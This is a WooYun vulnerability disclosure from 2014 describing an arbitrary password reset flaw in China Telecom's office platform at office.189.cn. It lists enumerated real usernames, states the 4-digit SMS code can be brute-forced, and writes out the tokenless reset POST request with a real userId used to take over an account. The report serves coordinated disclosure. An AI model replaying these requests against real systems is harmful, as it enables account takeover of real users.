当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078397

漏洞标题:来回重置中国电信综合办公平台任意帐号密码

相关厂商:189.cn

漏洞作者:

提交时间:2014-10-05 19:13

修复时间:2014-11-19 19:14

公开时间:2014-11-19 19:14

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-05: 细节已通知厂商并且等待厂商处理中
2014-10-11: 厂商已经确认,细节仅向厂商公开
2014-10-21: 细节向核心白帽子及相关领域专家公开
2014-10-31: 细节向普通白帽子公开
2014-11-10: 细节向实习白帽子公开
2014-11-19: 细节向公众公开

简要描述:

该综合办公平台的帐号是需要订购的,看我如何从无需注册帐号
还他一系列任意密码重置

详细说明:

http://office.189.cn/ 综合办公-V3.0.0
http://office.189.cn/ioop-bcs-web/sys/sys-pwd-question!input.do 找回密码
请输入登录账号可枚举用户名,这里提供几个账户

t1.jpg


cui
chun
dan
dong
gao
guan
hua
juan
lei
li
lin
qi
rui
tao
yang
zhang
zhen
zheng
alao
amin
ane

以tao为例,手机验证码找回,获取一下,验证码为4位数字 可爆破

t2.jpg

t3.jpg

t4.jpg

t5.jpg


这是一处,再来,我们看看修改密码的请求

POST /ioop-bcs-web/sys/sys-pwd-question!check.do HTTP/1.1
Host: office.189.cn
Proxy-Connection: keep-alive
Content-Length: 87
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://office.189.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://office.189.cn/ioop-bcs-web/sys/sys-pwd-question!check.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie:
userId=ff808081452c2fcc0147246ebabf1d20&step=4&password=wooyuntest&password2=wooyuntest


咋眼一看没有Token,也就是说只要我们获取到userId参数也可以重置任意账户密码
至于怎么获取呢,我们再回到上几步,请输入登录账号找回密码处,响应返回了找回的当前帐号对应的userId参数
如:找回帐号“yang”,获取到userId:402835d03f2446d6013f4039d6ae4491

t6.jpg


构造如下post:

http://office.189.cn/ioop-bcs-web/sys/sys-pwd-question!check.do
userId=402835d03f2446d6013f4039d6ae4491&step=4&password=wooyuntest&password2=wooyuntest


yang:wooyuntest

t7.jpg

t8.jpg

漏洞证明:

测试得出admin是系统管理员帐号,为避免打草惊蛇,就不进行操作了,不然权限目测更大。

修复方案:

看到了开头就已然猜到了结局

版权声明:转载请注明来源 @乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-10-11 15:36

厂商回复:

最新状态:

暂无